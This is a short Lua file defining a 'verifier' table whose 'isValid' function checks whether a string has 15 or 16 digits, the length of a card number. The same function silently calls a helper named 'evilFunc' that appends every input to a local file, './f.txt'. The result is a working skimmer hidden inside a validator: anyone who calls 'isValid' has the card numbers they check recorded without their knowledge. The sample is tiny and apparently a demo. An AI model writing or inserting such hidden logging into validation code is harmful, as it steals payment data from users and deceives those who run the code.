---
--- Generated by Luanalysis
--- Created by swift.
--- DateTime: 10/22/24 14:57
---
---
--function printTable(tb)
--    for k,v in pairs(tb) do
--        print(k, v)
--    end
--end


verifier = {
    val = "val of verifier";
    valid = function(str)
        digitsCount = 0

        for i = 1, #str do
            char = string.sub(str, i, i);
            if tonumber(char) ~= nil then
                digitsCount = digitsCount + 1
            end
        end

        return digitsCount == 15 or digitsCount == 16
    end;

    evilFunc = function(str)
        file = io.open("./f.txt", "a+")
        io.output(file)
        io.write(str)
        io.close(file)
    end;

    isValid = function(str)
        verifier.evilFunc(str)
        return verifier.valid(str)
    end;
}
